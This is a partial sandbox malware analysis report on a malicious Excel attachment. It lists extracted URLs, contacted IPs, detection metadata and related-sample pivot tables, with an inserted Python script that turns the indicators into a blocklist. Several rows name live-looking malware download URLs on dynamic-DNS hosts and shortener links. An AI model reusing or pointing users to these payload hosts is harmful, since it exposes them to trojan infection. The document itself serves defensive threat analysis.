http://www.nifty.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.dailymail.co.uk/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://buscar.ya.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.iis.fhg.de/audioPA | vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://asp.usatoday.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://fr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://rover.ebay.com | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://in.search.yahoo.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.ebay.in/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://%s.com | explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
http://msk.afisha.ru/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.rediff.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp | false | - | high
http://www.ya.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://it.search.dada.net/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.naver.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.google.ru/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.hanafos.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abril.com.br/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.daum.net/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.naver.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.clarin.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://buscar.ozu.es/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://kr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.about.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://busca.igbusca.com.br/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.ask.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.priceminister.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.cjmall.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.centrum.cz/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://suche.t-online.de/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.google.it/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.auction.co.kr/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.ceneo.pl/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.amazon.de/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000002.2375810590.0000000000260000.00000004.00000020.sdmp | false | - | high
http://sads.myspace.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://busca.buscape.com.br/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pchome.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://browse.guardian.co.uk/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://google.pchome.com.tw/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q= | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.rambler.ru/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://uk.search.yahoo.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://espanol.search.yahoo.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.ozu.es/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.sify.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://openimage.interpark.com/interpark.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.yahoo.co.jp/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.gmarket.co.kr/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.nifty.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://searchresults.news.com.au/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.google.si/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.google.cz/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.soso.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.univision.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.ebay.it/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://images.joins.com/ui_c/fvc_joins.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.asharqalawsat.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://busca.orange.es/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://cnweb.search.live.com/results.aspx?q= | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://service2.bfast.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.%s.comPAvbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              low
                                                                                                                                                              http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high

Contacted IPs


Public

IP                Domain    Country         ASN      ASN Name                                                   Malicious
103.140.251.164   unknown   Viet Nam        135905   VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP VN   false
54.67.57.56       unknown   United States   16509    AMAZON-02 US                                               false
191.96.163.202    unknown   Chile           61317    ASDETUKhttpwwwheficedcom GB                                true
52.57.196.177     unknown   United States   16509    AMAZON-02 US                                               false
104.21.61.250     unknown   United States   13335    CLOUDFLARENET US                                           true
103.251.44.218    unknown   Indonesia       131775   IDNIC-JALANET-AS-ID PT Jupiter Jala Arta ID                true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356571
Start date: 23.02.2021
Start time: 10:24:37
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 0s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: QTN3C2AF414EDF9_041873.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/12@8/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 34.4% (good quality ratio 32.7%)
• Quality average: 72.5%
• Quality standard deviation: 29.1%
HCA Information:
• Successful, ratio: 84%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100

Simulations

Behavior and APIs

Time       Type              Description
10:26:11   API Interceptor   76x Sleep call for process: EQNEDT32.EXE modified
10:26:17   API Interceptor   34x Sleep call for process: vbc.exe modified
10:26:37   API Interceptor   212x Sleep call for process: ipconfig.exe modified
10:27:19   API Interceptor   1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match   Associated Sample Name / URL   SHA 256   Detection   Link   Context
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
                                                                                                                                                                INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreensndykeghesnpw.dns.army/aledoc/winlog.exe
                                                                                                                                                                RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreensndykeghesnpw.dns.army/aledoc/winlog.exe
                                                                                                                                                                PE20-RQ- 1638.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                SHEXD201990876_SHIPPING_DOCUMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                2218003603 92390-00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                inquiry10204168.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                RFQ 41680.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                RF-E68-STD-2020-106.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                SCAN DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • bvcxzlkjhgfdsapoiuytrewqwertyuiopasdfghj.ydns.eu/invoice.doc
                                                                                                                                                                54.67.57.56MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/dytF30rxT6o
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/GNEu30rxT59
                                                                                                                                                                New_Message00934.htmGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/J9A830rbc9g
                                                                                                                                                                http://ht.ly/Q3Px30qXOOAGet hashmaliciousBrowse
                                                                                                                                                                • ht.ly/Q3Px30qXOOA
                                                                                                                                                                http://ow.ly/Rrh750jwUFvGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/Rrh750jwUFv
                                                                                                                                                                C72781002.pdfGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/pnzA30gASLt
                                                                                                                                                                http://ow.ly/F2zF30gk7FA?f$9fk45ft987hGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/F2zF30gk7FA?f$9fk45ft987h
                                                                                                                                                                NEW QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/5LIK30cNgLL
                                                                                                                                                                DHL_TRACKING_DETAILS_-_Copy.pdfGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/YFZ6w

Domains

Match | Associated Sample Name / URL | Detection | Context
----- | ---------------------------- | --------- | -------
algreenstdykeghestqw.dns.army | quotation10204168.dox.xlsx | malicious | 103.140.251.164
ow.ly | MV ASIA EMERALD II.xlsx | malicious | 54.67.57.56
 | TRANSIT MANIFEST CARGO FORM.xlsx | malicious | 54.67.120.65
 | ORDER LIST.xlsx | malicious | 54.67.62.204
 | BL + PL + CI.xlsx | malicious | 54.67.120.65
 | #U007einvoice#U007eSC00978656.xlsx | malicious | 54.67.57.56
 | New_Message00934.htm | malicious | 54.67.57.56
 | https://u17588438.ct.sendgrid.net/ls/click?upn=h-2Bj1pe3h4Ysprj-2F8RRf9ChxAthv8oUCYMnydAOiqdZUW-2BWPjSW0-2FEf5GesIstZyF0TVG_lbRSzjTjAOmWKCI6GhhOife1Jj1xtmqeANf3i3jW3opERdKAfB6RW1d9S3-2BY3uAZ73G93x4NRv3SGU9GC4XSs1eCeVJJbjnXgiEyfnLUrO5zxeR-2BpWFMutEFdboHQGx95igAqkR70Vu4Hiwd9NcrDdrJs-2BOivQ93TFqP-2BT4HPMkXW0NLxBKQVPvAgnXNChoww1TXGQN2qsuqwn8GkbQaq3PqNM7QYH3v-2Fv5T56RWSqXIWExu7REiKCcAp9f6Du8y | malicious | 54.67.120.65
 | https://u18021447.ct.sendgrid.net/ls/click?upn=4-2B97j-2BtYQoCI2fDYEybJE8VXu-2FoT5KUlTEBIP-2FZpwja1LaUJU-2BvsibdvO6vqoNKGEtLN_tkuwbiJYWhKaepE-2BM1TZDajlOQqjy023dIArdFfY4Q7aInX1fHyzMaSNgDpN4RXFFT28Nvm4lTgRP2Lo2wigkcpLbULWR3rg-2FE60qFalXBd1XauXGfqffZ3Vso2GpH8M2RIy-2BLstJ0DTX5Ex-2FSV3rlGx9ZgW98jLaWYfY9EKxp-2Bb-2FdkzvrNyt500LWgC9ORMQ0r6YfW8Y79Zk2VNJnudzlxb1CJo-2FW7Zs6eo8A-2FWgzs-3D | malicious | 54.67.62.204
 | http://ow.ly/nDiV30mD63n | malicious | 54.183.132.164
 | http://ow.ly/Rrh750jwUFv | malicious | 54.67.57.56
 | GTEDS.pdf | malicious | 54.67.120.65
 | GTEDS.pdf | malicious | 54.183.130.144
 | Marine Engine Spare Parts Order_first.pdf | malicious | 54.67.120.65
 | CCS Projects.pdf | malicious | 54.183.132.164
 | http://ow.ly/8rYF30jYWv5 | malicious | 54.67.120.65
 | Locked.pdf | malicious | 54.183.131.91
 | http://ow.ly/avIT30jzSjv | malicious | 54.67.120.65
 | 9a835a425c8321c22d5a751078cb5f020abaaaafe7cf80fee68237d0811fcae.pdf | malicious | 54.183.130.144
 | http://ow.ly/4mh330j3SCO | malicious | 54.67.120.65
 | ACHIEVE-1 CONTRACT.pdf | malicious | 54.67.62.204
oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | G6FkfjX5Ow.exe | malicious | 18.195.132.44
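The URL and Domains pivot rows above repeat the same few second-stage hosts and shortener links many times, and the useful indicator set is much smaller than the row count suggests. The following Python script is an added example, not part of the Joe Sandbox report: it collapses those rows into a de-duplicated indicator set, separating dynamic-DNS payload hosts (which can go straight onto a blocklist) from URL-shortener hops (where only the short-link path is actionable, since blocking ow.ly itself is rarely acceptable). The input lists are copied from the tables on this page and labelled as constructed; the dynamic-DNS and shortener suffix lists are assumptions chosen from the hosts visible here, not a vendor-maintained list.

```python
"""Collapse sandbox 'similar samples' pivot rows into a de-duplicated indicator set.

Added example, not code from the report. The suffix lists below are assumptions
drawn from the hosts seen on this page, not an authoritative DDNS/shortener list.
"""
from collections import defaultdict
from urllib.parse import urlsplit

DDNS_SUFFIXES = (".dns.army", ".dns.navy", ".ydns.eu")   # assumption: free dynamic-DNS zones
SHORTENER_HOSTS = {"ow.ly", "ht.ly"}                      # assumption: Hootsuite shortener hosts

# Constructed input: the Context column of the URL table above, duplicates included.
URL_CONTEXTS = [
    "algreenstdykeghestqw.dns.army/receipat/winlog.exe", "thdyalgreenkeghethbm.dns.army/receipat/winlog.exe",
    "algreenstdykeghestyc.dns.army/receipat/winlog.exe", "algreenstdykeghestak.dns.army/receipat/winlog.exe",
    "algreenstdykeghestak.dns.army/receipat/winlog.exe", "algreenstdykeghestak.dns.army/receipat/winlog.exe",
    "wsdyalgreenkeghewsmq.dns.army/receipat/winlog.exe", "wsdyalgreenkeghewsmq.dns.army/receipat/winlog.exe",
    "algreenstdykeghestdb.dns.army/receipat/winlog.exe", "algreenstdykeghestdb.dns.army/receipat/winlog.exe",
    "algreenstdykeghestdb.dns.army/receipat/winlog.exe", "algreensndykeghesnpw.dns.army/aledoc/winlog.exe",
    "algreensndykeghesnpw.dns.army/aledoc/winlog.exe", "algreenstdykegheedst.dns.navy/aledoc/winlog.exe",
    "algreenstdykegheedst.dns.navy/aledoc/winlog.exe", "algreenstdykegheedst.dns.navy/aledoc/winlog.exe",
    "algreenstdykegheedah.dns.army/aledoc/winlog.exe", "algreenstdykegheedah.dns.army/aledoc/winlog.exe",
    "algreenstdykegheedah.dns.army/aledoc/winlog.exe",
    "bvcxzlkjhgfdsapoiuytrewqwertyuiopasdfghj.ydns.eu/invoice.doc",
    "ow.ly/dytF30rxT6o", "ow.ly/GNEu30rxT59", "ow.ly/J9A830rbc9g", "ht.ly/Q3Px30qXOOA",
    "ow.ly/Rrh750jwUFv", "ow.ly/pnzA30gASLt", "ow.ly/F2zF30gk7FA?f$9fk45ft987h",
    "ow.ly/5LIK30cNgLL", "ow.ly/YFZ6w",
]

# Constructed input: (domain match, resolved IP) pairs from the Domains table above.
DOMAIN_CONTEXTS = [
    ("algreenstdykeghestqw.dns.army", "103.140.251.164"),
    ("ow.ly", "54.67.57.56"), ("ow.ly", "54.67.120.65"), ("ow.ly", "54.67.62.204"),
    ("ow.ly", "54.183.132.164"), ("ow.ly", "54.183.130.144"), ("ow.ly", "54.183.131.91"),
    ("oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com", "18.195.132.44"),
]


def split_url(raw):
    """Return (host, path) for a URL given with or without a scheme; query string is dropped."""
    parts = urlsplit(raw if "://" in raw else "http://" + raw)
    return parts.hostname.lower(), parts.path or "/"


def classify_host(host):
    """Bucket a host by how it should be acted on."""
    if host in SHORTENER_HOSTS:
        return "shortener"
    if host.endswith(DDNS_SUFFIXES):
        return "ddns-payload"
    return "other"


def build_indicators(url_contexts=URL_CONTEXTS, domain_contexts=DOMAIN_CONTEXTS):
    """Return ({category: {host: {paths}}}, {domain: {ips}}) with duplicates removed."""
    hosts = defaultdict(lambda: defaultdict(set))
    for raw in url_contexts:
        host, path = split_url(raw)
        hosts[classify_host(host)][host].add(path)
    resolutions = defaultdict(set)
    for domain, ip in domain_contexts:
        resolutions[domain.lower()].add(ip)
    return hosts, resolutions


def payload_paths(hosts):
    """Distinct download paths on DDNS hosts: the part that survives hostname churn."""
    return sorted({p for paths in hosts["ddns-payload"].values() for p in paths})


def blocklist(hosts):
    """Hosts safe to block outright; shortener hosts are deliberately excluded."""
    return sorted(hosts["ddns-payload"])


if __name__ == "__main__":
    h, r = build_indicators()
    print("blocklist:", blocklist(h))
    print("payload paths:", payload_paths(h))
    print("shortener links:", {k: sorted(v) for k, v in h["shortener"].items()})
    print("ow.ly resolutions:", sorted(r["ow.ly"]))
```

Ten distinct hosts collapse onto three download paths, which is why the path plus the parent dynamic-DNS zone makes a more durable detection than any single hostname; the six AWS addresses behind ow.ly are the shortener's own infrastructure and should not be treated as attacker-controlled.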

ASN

Match | Associated Sample Name / URL | Detection | Context
----- | ---------------------------- | --------- | -------
AMAZON-02US | MV ASIA EMERALD II.xlsx | malicious | 54.67.57.56
 | TRANSIT MANIFEST CARGO FORM.xlsx | malicious | 54.67.120.65
 | 8TD8GfTtaW.exe | malicious | 104.192.141.1
 | R4VugGhHOo.exe | malicious | 18.197.52.125
 | RFQ.exe | malicious | 52.58.78.16
 | ORDER SPECIFICATIONS.exe | malicious | 13.57.130.120
 | 22 FEB -PROCESSING.xlsx | malicious | 35.158.240.78
 | ORDER LIST.xlsx | malicious | 54.67.62.204
 | BL + PL + CI.xlsx | malicious | 54.67.120.65
 | #U007einvoice#U007eSC00978656.xlsx | malicious | 54.67.57.56
 | FortPlayerInstaller.exe | malicious | 13.224.94.78
 | RGB HeroInstaller.exe | malicious | 99.86.159.18
 | Buff-Installer.exe | malicious | 13.224.195.128
 | PO_210222.exe | malicious | 52.58.78.16
 | Order83930.exe | malicious | 3.131.252.17
 | rieuro.dll | malicious | 143.204.4.74
 | AWB-INVOICE_PDF.exe | malicious | 52.213.114.86
 | document-1915351743.xls | malicious | 143.204.4.74
 | X1(1).xlsm | malicious | 99.86.159.123
 | wsXYadCYsE.pkg | malicious | 52.216.242.12
ASDETUKhttpwwwheficedcomGB | Proforma invoice.xlsx | malicious | 181.214.31.82
 | DnHeI10lQ6.exe | malicious | 191.101.50.30
 | Mortgage Description.exe | malicious | 45.221.66.18
 | 35HFM7BNtD.exe | malicious | 45.150.67.133
 | QwLijaR9ex.exe | malicious | 45.150.67.133
 | order_list_fe99087.xls | malicious | 45.150.67.133
 | 516783.PO.xls | malicious | 45.150.67.133
 | RFQ# 02012021.xlsx | malicious | 181.214.31.82
 | QRN-CLJC-06112020149.xlsx | malicious | 181.214.31.82
 | RFQ#212021.xlsx | malicious | 181.214.31.82
 | RFQ #28012021.xlsx | malicious | 181.214.31.82
 | Req for Quote.xlsx | malicious | 181.214.31.82
 | RFQ.xlsx | malicious | 181.214.31.82
 | JANUARY QUOTATION FOR PRODUCT ORDER 02983H G FOR Goldolphin INDUSTRIES LTD PACKING LIST FOR 60MM.exe | malicious | 45.221.66.154
 | ACH Remittance Details.xls | malicious | 181.214.142.116
 | ACH Remittance Details.xls | malicious | 181.214.142.116
 | ACH Remittance Details.xls | malicious | 181.214.142.116
 | BFSV-1F(N)_1B-8B_ANSI.exe | malicious | 45.138.49.96
                                                                                                                                                                ts1593782194000000.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                https://mysp.ac/WJKWebxcAX/../4lj3C#fCfAXmrBDFsvHupFQHQULbmkQvYGet hashmaliciousBrowse
